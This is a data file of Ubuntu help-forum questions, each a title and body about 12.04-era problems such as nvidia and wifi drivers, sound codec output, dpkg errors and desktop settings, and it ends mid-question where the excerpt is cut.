131395	where is the delete account button in thunderbird on ubuntu 12.04	i was unable to find the `` delete account '' button in thunderbird on ubuntu 12.04 . saw posts saying that i can find it at the bottom left side , but could not find it . please help me find that button .
131397	what is a repository key under ubuntu and how do they work ?	most of the time just adding package repository allows to download and install packages without repository key . also some repository put there key beside to add . but why we need to add keys if we can install packages without them ? how do they work under ubuntu ?
131405	nautilus : open extra pane showing specific location ?	the default behavior of f3 in nautilus is to open the extra pane , showing the same location as the first pane . is it possible to change this behavior or add something new which will open the extra pane always showing the same location , e.g . my home folder or the downloads folder ?
131407	dodo usb modem ( alcatel 'onetouch x220l ' ) not working since update to 12.04	i have a dodo usb modem in which i had used perfectly fine in 11.10 . when i first installed ubuntu i plugged the usb modem in and it worked perfectly as is . however , since the new update it will not do such , i 've tried updating all the software and what not , updated usb-modeswitch , tried ndiswrapper ( although , it was worth a shot ) and yet nothing works still . i have also used lsusb as per on the mobilewirelessbroadband page and it is apparently there . bus 001 device 010 : id 1bbb:0017 t & a mobile phones not sure if i 'm missing anything , so just thought i 'd ask . ; - )
131408	search for videos outside `` my videos '' folder using video lens	my remote scope for the video lens has the following : youtube movies ted talks ? ? some chinese characters ? ? encuentro rtve 3sat mediathek youtube education vodo sci-fi london youtube shows vimeo bing video dailymotion there is no normal youtube , does anyone know why this is the case ? when searching for videos locally , it searches the `` my videos '' directory . i believe this is hardcoded correct ? i tried adding in a symbolic link inside my videos to an external fat32 drive but the lens did n't search it . is there any way to make this work ? edit symlink following is listed as a feature in progress : https : //bugs.launchpad.net/unity-lens-videos/+bug/934589
131415	ubuntu desktop 12.04 lts hangs with dual display	i upgraded my ubuntu 11.04 oneric to the latest version ubuntu 12.04 lts this morning , but after installing all upgrades & cleaning up ( upgradation steps ) , when it restarted first time to complete installation , it got hang . then i removed vga cable of external display attached to my laptop & did a hard reboot then booted successfully and again when i connected other display , it got stuck again . note : i did upgrade to 12.04 lts with 2nd display connected & that combo was working well with 11.04 oneric .
131416	how to open a folder in a new pane in nautilus ?	when i rightclick a folder in nautilus i find these options `` open in new window '' and `` open in new tab '' . is it possible to add an option `` open in new pane '' which would open the selected folder in a new pane as it appears when i press f3 ? what would be the parameters for nautilus actions or can i realize this with nautilus scripts ?
131417	12.04 gnome classic ambiance font problem	i 've tried standard ambiance and have tried ambiance oneiric but the color of the windows on the panel has not changed.the color is still white . and the problem with the color of the font gnome menu.小olor is darker . how do i fix this ?
131435	can i force kubuntu installer to use nvidia driver , not nouveau ?	is there an alternate install routine for kubuntu 12.04 that would force the installer to use the nvidia driver rather than nouveau ? i ask because i 've installed kde-full on ubuntu 12.04 and like it . i may decide to install kubuntu . however , the kernel currently on the ubuntu install images will cause a crash almost immediately after installation begins -- before grub runs -- that appears to be triggered when x attempts to launch nouveau . here , the machine locks up and requires a power toggle . to install ubuntu 12.04 , i had to install 11.10 , ensure the nvidia driver was installed and nouveau blacklisted , and then dist-upgrade to 12.04 . i do n't want to do that if i decide to install kubuntu . hence , i 'm looking for a way to get the installer to use the nvidia driver . or , an install method that avoids the entire issue until the nvidia driver can be installed .
131436	wifi connectivity problems when using wpa/wpa2 encryption	this just seems like a common problem , however i was not able to find a solution on the net . for some reason ubuntu does n't like wpa/wpa2 personal encryption . i can connect to the network fine ( others have reported they are not able to connect and the 'authentication required window ' keeps on appearing ) , however i am unable to connect to the internet . when i change the security settings of the router to 'open ' or to 'wep ' i can connect fine . however 'wep ' slows down the connection by a factor of 2 . several people have suggested to use 'wicd ' instead of 'network-manager ' i tried that but i got the same problems . please note that i have had this problem with ubuntu 11.10 and now it seems it has carried over to 12.04 . also note that i dont think it is a problem with the wireless router ( medialink ) because my windows 7 machine , ipad and android phone all connect fine . any ideas ? thanks in advance
131440	sound card hp beats edition envy 14 - codec : idt 92hd81b1x5	i 've been trying to put 8 channels working on ubuntu since the 11.10 ( i 'm now with the 12.04 ) but with no luck . i only get 2 channels working . i 've tried many internet posts but with no luck . does anyone has a solution for this ? i 've added in /etc/modprobe.d/ : options snd-hda-intel model=auto and i tried with other models ( because i can find the right one to my sound card ) and only get 2 channels working . when i run gnome-alsamixer it only give me access to intel cougarpoint hdmi sound card not to : idt 92hd81b1x5 any help please ? thanks in advance . hardware info : root @ beatsaudio : /home/edup # lspci |grep audio < code > 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) < /code > root @ beatsaudio : /home/edup # lshw -c multimedia < code > *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:55 memory : c9700000-c9703fff < /code > root @ beatsaudio : /home/edup # cat /proc/asound/card0/codec # * |grep codec < code > codec : idt 92hd81b1x5 codec : intel cougarpoint hdmi < /code > root @ beatsaudio : /home/edup # aplay -l < code > **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 < /code > root @ beatsaudio : /home/edup # cat /proc/asound/card0/codec # * < code > codec : idt 92hd81b1x5 address : 0 afg function id : 0x1 ( unsol 1 ) vendor id : 0x111d7605 subsystem id : 0x103c3385 revision id : 0x100105 no modem function group found default pcm : rates [ 0x5e0 ] : 44100 48000 88200 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm default amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 default amp-out caps : ofs=0x7f , nsteps=0x7f , stepsize=0x02 , mute=1 gpio : io=3 , o=0 , i=0 , unsolicited=1 , wake=1 io [ 0 ] : enable=1 , dir=1 , wake=0 , sticky=0 , data=1 , unsol=0 io [ 1 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 2 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 power-map : 0x02 node 0x0a [ pin complex ] wcaps 0x400583 : stereo amp-in control : name= '' mic jack mode '' , index=0 , device=0 controlamp : chs=0 , dir=in , idx=0 , ofs=0 control : name= '' mic capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' mic jack '' , index=0 , device=0 amp-in caps : n/a amp-in vals : [ 0x00 0x00 ] pincap 0x0001173c : in out hp eapd detect vref caps : hiz 50 grd 80 eapd 0x2 : eapd pin default 0x03a12020 : [ jack ] mic at ext left conn = 1/8 , color = grey defassociation = 0x2 , sequence = 0x0 pin-ctls : 0x24 : in vref_80 unsolicited : tag=02 , enabled=1 power : setting=d0 , actual=d0 connection : 3 0x13* 0x14 0x1c node 0x0b [ pin complex ] wcaps 0x400581 : stereo control : name= '' headphone jack '' , index=0 , device=0 pincap 0x0001001c : out hp eapd detect eapd 0x2 : eapd pin default 0x0321201f : [ jack ] hp out at ext left conn = 1/8 , color = grey defassociation = 0x1 , sequence = 0xf pin-ctls : 0xc0 : out hp unsolicited : tag=01 , enabled=1 power : setting=d0 , actual=d0 connection : 3 0x13 0x14* 0x1c node 0x0c [ pin complex ] wcaps 0x400583 : stereo amp-in amp-in caps : n/a amp-in vals : [ 0x00 0x00 ] pincap 0x00011734 : in out eapd detect vref caps : hiz 50 grd 80 eapd 0x2 : eapd pin default 0x40f000f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 pin-ctls : 0x00 : vref_hiz unsolicited : tag=00 , enabled=0 power : setting=d0 , actual=d0 connection : 3 0x13* 0x14 0x1c node 0x0d [ pin complex ] wcaps 0x400501 : stereo pincap 0x00010050 : out eapd balanced eapd 0x2 : eapd pin default 0x90170110 : [ fixed ] speaker at int n/a conn = analog , color = unknown defassociation = 0x1 , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out power : setting=d0 , actual=d0 connection : 3 0x13* 0x14 0x1c node 0x0e [ pin complex ] wcaps 0x400583 : stereo amp-in amp-in caps : n/a amp-in vals : [ 0x00 0x00 ] pincap 0x00010034 : in out eapd detect eapd 0x2 : eapd pin default 0x40f000f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power : setting=d0 , actual=d0 connection : 3 0x13* 0x14 0x1c node 0x0f [ pin complex ] wcaps 0x400583 : stereo amp-in amp-in caps : n/a amp-in vals : [ 0x00 0x00 ] pincap 0x00010034 : in out eapd detect eapd 0x2 : eapd pin default 0x40f000f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power : setting=d0 , actual=d0 connection : 3 0x13* 0x14 0x1c node 0x10 [ pin complex ] wcaps 0x400500 : mono pincap 0x00000010 : out pin default 0x40f000f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 pin-ctls : 0x00 : power : setting=d0 , actual=d0 connection : 1 0x1a node 0x11 [ pin complex ] wcaps 0x400483 : stereo amp-in control : name= '' internal mic capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 amp-in caps : n/a amp-in vals : [ 0x00 0x00 ] pincap 0x00000024 : in detect pin default 0xd5a30130 : [ both ] mic at int top conn = atapi , color = unknown defassociation = 0x3 , sequence = 0x0 misc = no_presence pin-ctls : 0x20 : in unsolicited : tag=00 , enabled=0 power : setting=d0 , actual=d0 node 0x12 [ vendor defined widget ] wcaps 0xf00503 : stereo amp-in amp-in caps : n/a amp-in vals : [ 0x00 0x00 ] power : setting=d0 , actual=d0 connection : 1 0x20 node 0x13 [ audio output ] wcaps 0xd0c05 : stereo amp-out r/l control : name= '' speaker playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=63 control : name= '' speaker playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 device : name= '' stac92xx analog '' , type= '' audio '' , device=0 amp-out caps : n/a amp-out vals : [ 0x74 0x74 ] converter : stream=8 , channel=0 power : setting=d0 , actual=d0 delay : 13 samples node 0x14 [ audio output ] wcaps 0xd0c05 : stereo amp-out r/l control : name= '' headphone playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=63 control : name= '' headphone playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : n/a amp-out vals : [ 0x74 0x74 ] converter : stream=8 , channel=0 power : setting=d0 , actual=d0 delay : 13 samples node 0x15 [ audio input ] wcaps 0x1d0541 : stereo device : name= '' stac92xx analog '' , type= '' audio '' , device=0 converter : stream=4 , channel=0 sdi-select : 0 power : setting=d0 , actual=d0 delay : 13 samples connection : 1 0x17 processing caps : benign=0 , ncoeff=0 node 0x16 [ audio input ] wcaps 0x1d0541 : stereo converter : stream=0 , channel=0 sdi-select : 0 power : setting=d0 , actual=d0 delay : 13 samples connection : 1 0x18 processing caps : benign=0 , ncoeff=0 node 0x17 [ audio selector ] wcaps 0x300d0d : stereo amp-out r/l control : name= '' capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' capture switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x00 , nsteps=0x0f , stepsize=0x05 , mute=1 amp-out vals : [ 0x00 0x03 ] power : setting=d0 , actual=d0 connection : 7 0x0c 0x0e 0x0f 0x1b 0x11* 0x12 0x0a node 0x18 [ audio selector ] wcaps 0x300d0d : stereo amp-out r/l amp-out caps : ofs=0x00 , nsteps=0x0f , stepsize=0x05 , mute=1 amp-out vals : [ 0x80 0x80 ] power : setting=d0 , actual=d0 connection : 7 0x0c* 0x0e 0x0f 0x1b 0x11 0x12 0x0a node 0x19 [ audio selector ] wcaps 0x300501 : stereo power : setting=d0 , actual=d0 connection : 3 0x13* 0x14 0x1c node 0x1a [ audio mixer ] wcaps 0x200500 : mono power : setting=d0 , actual=d0 connection : 1 0x19 node 0x1b [ audio mixer ] wcaps 0x20050b : stereo amp-in amp-in caps : ofs=0x17 , nsteps=0x1f , stepsize=0x05 , mute=1 amp-in vals : [ 0x97 0x97 ] [ 0x97 0x97 ] [ 0x97 0x97 ] [ 0x97 0x97 ] [ 0x97 0x97 ] [ 0x97 0x97 ] power : setting=d0 , actual=d0 connection : 6 0x0c 0x0e 0x0f 0x13 0x14 0x0a node 0x1c [ audio selector ] wcaps 0x30050d : stereo amp-out amp-out caps : ofs=0x1f , nsteps=0x1f , stepsize=0x05 , mute=1 amp-out vals : [ 0x9f 0x9f ] power : setting=d0 , actual=d0 connection : 1 0x1b node 0x1d [ audio output ] wcaps 0x4061d : stereo digital amp-out amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] converter : stream=0 , channel=0 digital : digital category : 0x0 pcm : rates [ 0x5e0 ] : 44100 48000 88200 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power : setting=d0 , actual=d0 delay : 4 samples node 0x1e [ audio output ] wcaps 0x4061d : stereo digital amp-out amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] converter : stream=0 , channel=0 digital : digital category : 0x0 pcm : rates [ 0x5e0 ] : 44100 48000 88200 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power : setting=d0 , actual=d0 delay : 4 samples node 0x1f [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000014 : out detect pin default 0x40f000f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power : setting=d0 , actual=d0 connection : 1 0x1d node 0x20 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000034 : in out detect pin default 0x40f000f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power : setting=d0 , actual=d0 connection : 1 0x1e node 0x21 [ beep generator widget ] wcaps 0x70040c : mono amp-out control : name= '' beep playback switch '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 control : name= '' beep playback volume '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x03 , nsteps=0x03 , stepsize=0x17 , mute=1 amp-out vals : [ 0x00 ] power : setting=d0 , actual=d0 node 0x22 [ vendor defined widget ] wcaps 0xf00000 : mono codec : intel cougarpoint hdmi address : 3 afg function id : 0x1 ( unsol 0 ) vendor id : 0x80862805 subsystem id : 0x80860101 revision id : 0x100000 no modem function group found default pcm : rates [ 0x0 ] : bits [ 0x0 ] : formats [ 0x0 ] : default amp-in caps : n/a default amp-out caps : n/a gpio : io=0 , o=0 , i=0 , unsolicited=0 , wake=0 node 0x02 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=0 , channel=0 digital : enabled digital category : 0x0 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 epss power : setting=d0 , actual=d0 node 0x03 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=0 , channel=0 digital : enabled genlevel digital category : 0x2 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 epss power : setting=d0 , actual=d0 node 0x04 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=0 , channel=0 digital : enabled genlevel digital category : 0x2 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 epss power : setting=d0 , actual=d0 node 0x05 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x80 ] pincap 0x09000094 : out detect hbr hdmi dp pin default 0x58560010 : [ n/a ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d3 epss power : setting=d0 , actual=d0 connection : 1 0x02 node 0x06 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp control : name= '' hdmi/dp , pcm=3 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=0 , device=0 control : name= '' iec958 playback pro mask '' , index=0 , device=0 control : name= '' iec958 playback default '' , index=0 , device=0 control : name= '' iec958 playback switch '' , index=0 , device=0 control : name= '' eld '' , index=0 , device=3 amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x09000094 : out detect hbr hdmi dp pin default 0x18560020 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x2 , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=01 , enabled=1 power states : d0 d3 epss power : setting=d0 , actual=d0 connection : 1 0x03 node 0x07 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp control : name= '' hdmi/dp , pcm=7 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=1 , device=0 control : name= '' iec958 playback pro mask '' , index=1 , device=0 control : name= '' iec958 playback default '' , index=1 , device=0 control : name= '' iec958 playback switch '' , index=1 , device=0 control : name= '' eld '' , index=0 , device=7 amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x09000094 : out detect hbr hdmi dp pin default 0x18560030 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x3 , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=02 , enabled=1 power states : d0 d3 epss power : setting=d0 , actual=d0 connection : 1 0x04 node 0x08 [ vendor defined widget ] wcaps 0xf00000 : mono < /code >
131449	remove unmet dependencies error	i did a : sudo dpkg -i -- force-depends package.deb the program was confused about a package that was n't installed ( it was ) . the program works fine , however now whenever i do an update , i get this message : you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : fern-wifi-cracker : depends : aircrack-ng ( > = 1.0 ) but it is not installable e : unmet dependencies . try using -f. the software center , update manager , everything is giving me hell . the question is , how do i tell the computer that everything is ok , and there are no unmet dependences ? if i do : sudo apt-get install -f it wants to remove the program i have installed ( not a good option if you ask me ) . any ideas on how to get my computer to chill out ? edit : added what actually happens with last command : user @ computer : ~ $ sudo apt-get install -f [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : fern-wifi-cracker 0 upgraded , 0 newly installed , 1 to remove and 32 not upgraded . after this operation , 1,532 kb disk space will be freed . do you want to continue [ y/n ] ?
131452	software sources not found in unity dash search	after upgrading to 12.04 from 11.10 , i am no longer able to find software sources in dash . i have installed software-properties-gtk , and can open via terminal , but can not get dash to find it ? is this still possible ? i want to be able to go direct to my sources without having to load synaptic or software center . what i have done now is launched from terminal , and then pinned to launcher , but typing in dash still does not find it .
131456	ca n't copy/paste contents on empathy	i 'm using empathy to connect to my chat accounts , but i 'm unable to select and copy text with ctrl+c shortcut . i can copy selected text if i press left mouse button and select `` copy '' . this problem is happening since i was using ubuntu oneiric and it 's happening on precise too . anyone know any workaround for this ?
131457	/etc/resolv.conf managed by nm ?	i discovered ( with great disappointment ) that in 12.04 the file /etc/resolv.conf no longer contains the real nameserver ip , but just 127.0.0.1 . in order now to know which is the dns , we have to `` easily '' type the simple command nmcli dev list iface eth0 my question is this : what if i need to change ( and i need it very often in my lan ) the nameserver and the search domain ? can we continue using /etc/resolv.conf or is there some new `` magic '' ?
131459	window decoration theme doesnât change back	my ambiance theme is broken . when i change the radiance to ambiance theme , title bar does not turn black , but still white as radiance title bar . how to fix it ?
131462	ubuntu giving error in vm	i 'm trying to install ubuntu 12.04 in many virtual pc 's but every time getting same error 's . do n't know why ? here are some screenshots : i 'm using 20.gb for ubuntu installation & 512 ram but it says you do n't have 4 gb free space . and if it pass hard disk process part it ll give error on other part . please let me know how can i fix this ?
131465	can not install nvidia drivers	i have 12.04 running on intel dual core with nvidia 8400 gs . i had installed the post-relase updates for nvidia , but encountered some problems , so removed [ deactivated ] them through `` aditional drivers '' . after restarting , when i went to install the recommended version current drivers through `` additional drivers '' , i get the following error : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log
131469	i ca n't open sh files with lxterminal	i 'm fairly new to lubuntu and had planned to run my mine craft server on it . the problem is that i can not run sh files . the window just flashes when i run with lxterminal - command '' /home/ [ username ] / [ server folder ] /craftbukkit.sh help !
131472	how do i change the default font for the terminal and gedit ?	i want to change the font style in terminal and for default gedit as well.so how to change the font type in ubuntu 12.04 ? any help and suggestions will be appreciable .
131476	can you choose not to use unity on install ?	i have been using ubuntu since version 9 and found it very friendly and wonderful to work with . is there a way to choose gnome-classic or other desktops on install ?
131483	internal microphone not working on hp 625 in 12.04	i installed the ubuntu 12.04 on my hp 625 laptop - it 's great , but ... i still ca n't use my internal microphone . when i go to sound settings it seems like the alsa plugin detects it , but does n't register any sound . any ideas ?
131487	mouse focus and keyboard error	my mouse can still move but is unable to interact with the windows under certain conditions . alt-tab does n't work . but i can kinda use my desktop with my keyboard . i want to report this bug but do n't know under witch package to file it in launchpad . can annyone point me in the right direction ?
131497	disable automatic unity launching ?	okay my main question here , is how do i disable the auto-matic unity launch at boot , or `` boot into ctrl-alt-f1-6 screen '' i find myself booting into that fairly quickly and then a few seconds later it launches unity login screen where from there i can login to an account and switch de 's , which then i switch back to the cli because i only booted the machine to run a few commands anyways ... i also know how to launch/get back to unity from the cli if i boot straight into it . another somewhat relevant question would be which command would i use to launch openbox de and skip the graphical login altogether ? and btw , i 'm using the current stable release of 12.04 precise pangolin ...
131499	installation error in 12.04	i tried installing using both usb and dvd but its showning the same error again and again : error in installation it may be due to cd/dvd damage or may be due faster burning of cd/dvd so thought burning with slower speed may solve the problem or run in cooler environment and something else . i tried with 11.10 by the same procedure it worked , but not with 12.04 . i 've the iso file . what should i do ? i am a great fan of ubuntu and wan na use the latest version as soon as possible . please give me some suggestions .
131502	d-link dwa-125 wireless network card not working after upgrade from 10.04 to 12.04	i upgraded to ubuntu 12.04 and now the wireless network card d-link dwa-125 does n't work . i have the drivers from the official website , but neither recognized during installation . iwconfig : lo no wireless extensions . vmnet8 no wireless extensions . ra0 ralink sta link quality:0 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 eth0 no wireless extensions . vmnet1 no wireless extensions . dava @ dava-ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 006 : id 07d1:3c0d d-link system dwa-125 wireless n 150 adapter ( rev.a1 ) [ ralink rt3070 ] and the chipset : ralink 2870/3070 ( rt3070 )
131506	how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ?	background : i 'm a 3d artist ( as a hobby ) and have recently started using ubuntu 12.04 lts as a dual-boot with windows 7 . it 's running on my a fairly new 64-bit toshiba laptop with an nvidia geforce gt 540m gpu ( graphics card ) . it also , however has intel integrated graphics ( which i suspect ubuntu 's been using ) . so , when i render my 3d scenes to images on windows , i am able to choose between using my cpu or my nvidia gpu ( faster ) . from the 3d application , i can set the gpu to use either cuda or opencl . in ubuntu , there 's no gpu option . after doing ( too much ? ) research on the issues with linux and the nvidia optimus technology , i am slightly more enlightened , but a lot more confused . i do n't care one bit about the optimus technology , as battery life is not by any means an issue for me . here 's my question : what can i do to be able to use cuda-utilizing programs ( such as blender ) on my nvidia gpu in ubuntu ? will i need nvidia drivers ? ( i have heard they do n't play nicely with optimus setups on linux . ) is there at least a way to use opencl on my gpu in ubuntu ?
131507	easy tutorial to create unity lens ?	okay , i have been researching all day and night about creating a unity lens . unfortunately , i ended up for nothing . i found most of the tutorials on the web such as here and here are not helpful at all for a newbie like me ! those tutorials are not clear and lack of details . is there any other easier tutorials ? thanks in advance .
131508	12.04 and nvidia card problem with nvidia geforce 7025	i 've installed 12.04 and i have the nvidia card - geforce 7025/nvidia nforce630a . when i install the drivers ( 295.40 ) , my ubuntu becomes unuseful just like many other user have reported : the unity/x desktop screen is frozen/unresponsive/black ( though the mouse pointer moves fine , and occasionally with luck something responds after a minute or so ) . i tried to install ( with a lot of effort cause i 'm new on linux world ) the previous version ( 295.33 ) and it has worked , but really slow ( for example when i open the hud ) . how could i configure my nvidia card to get better results ? is there any other possibility instead of 295.33 ? ? this is driving me crazy ... thanks in advance .
131510	download upgrade interrupted	downloading most recent upgrade was interrupted when my computer froze . i force quit and now it will not load for me . message reads : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . when i typed this in , the message i receive is : unable to access dpkg status area : read-only file system .
131512	unable to update/ install any files	just now i installed ubuntu 12.04 on my lenovo g570 laptop . first i got an error at the time of installation ( do n't know about it ) and i restarted the system and next time , it went well . so , after installing problems started.. there was a error with `` language recognition '' and i tried to fix it but did n't work . i tried to install powertop to check the status of power management . at terminal : sudo apt-get install powertop this is the error i got surya @ surya-lenovo-g570 : ~ $ sudo apt-get powertop install [ sudo ] password for surya : e : invalid operation powertop surya @ surya-lenovo-g570 : ~ $ sudo apt-get install powertop reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . surya @ surya-lenovo-g570 : ~ $ ^c surya @ surya-lenovo-g570 : ~ $ ^c surya @ surya-lenovo-g570 : ~ $ ^c surya @ surya-lenovo-g570 : ~ $ i downloaded google chrome .deb one and tried to install but its not working . software center is opened and its not loading . there was a notification on the status bar which says : an error occurred please run the package manager from the right-click menu ... ... . ... e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages '' copy & paste '' from terminal is not really working ... when i press ctrl + c ; its showing ^c on terminal but its not working.. the most important error : i am unable to see a `` chip '' icon on the status bar so as to install proprietary drivers for my ati drivers ... the interesting part is , powertop worked will on live cd and it even detected my ati card . update when i opened `` software up to date '' , this showed a error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' : my laptop details lenovo g570 ; intel 2nd gen i5 processor 4gb ddr3 ram intel in-build graphics + amd radeon hd 6370m 1gb graphics . i need help asap .
131516	new ext4 partition and used space	i have fresh ext4 partition , which means i just formated it with mkfs.ext4 -m 0.1 /dev/mapper/abak-home , and there 's already 27g space used . setting reserved root space ( -m ) to 0 did n't have any effect . i 'm using lvm but i do n't think that lvm should have any effect in this . ubuntu version is 12.04 lts . # df -h filesystem size used avail use % mounted on ... /dev/mapper/abak-home 1.8t 27g 1.8t 2 % /home then i tried formating partition with ext3 and the result is much better : # df -h filesystem size used avail use % mounted on ... /dev/mapper/abak-home 1.8t 196m 1.8t 1 % /home anyway why the difference and how to fix this ?
131518	dropbox service not starting automatically after kernel upgrade	i upgraded a kernel on my 64bit 12.04 server and now the dropbox service is not launching after the reboot . i can still start it manually by : sudo service dropbox start i was using the instructions found here sudo update-rc.d dropbox defaults results are below : update-rc.d : warning : /etc/init.d/dropbox missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > system start/stop links for /etc/init.d/dropbox already exist .
131519	ubuntu server : intel driver uses lots of ram	i have tried installing squeeze , lucid and oneiric on my new dedicated server ( the host does n't have precise yet ) , and noticed that on fresh install they have very different memory usages . on lucid or oneiric , about 200-300mb memory is used ( excluding buffers/cache ) , i have checked top , but it 's just the normal sshd , bash , init , cron , etc . all added up they use only about 10-20mb . on squeeze , only less than 100mb is used . i checked /proc/meminfo ( in oneiric ) , and found vmallocused to be much larger in ubuntu , checked /proc/vmallocinfo , and found the following lines : 0xffffc90006600000-0xffffc90006681000 528384 i9xx_setup+0x3f/0xb0 phys=fe000000 ioremap 0xffffc90006700000-0xffffc90006901000 2101248 intel_gtt_init+0xa0/0x130 phys=fe200000 ioremap 0xffffc90006901000-0xffffc90007102000 8392704 sys_swapon+0x171/0x570 pages=2048 vmalloc vpages n0=2048 0xffffc90007180000-0xffffc90007581000 4198400 pci_iomap+0x80/0xc0 phys=fe000000 ioremap 0xffffc90007600000-0xffffc90017601000 268439552 i915_driver_load+0x111/0x6e0 [ i915 ] phys=c0000000 ioremap 0xffffe8ffffc00000-0xffffe8ffffe00000 2097152 pcpu_get_vm_areas+0x0/0x510 vmalloc of these , only the sys_swapon and pcpu_get_vm_areas lines exist in squeeze . my question is , why is `` 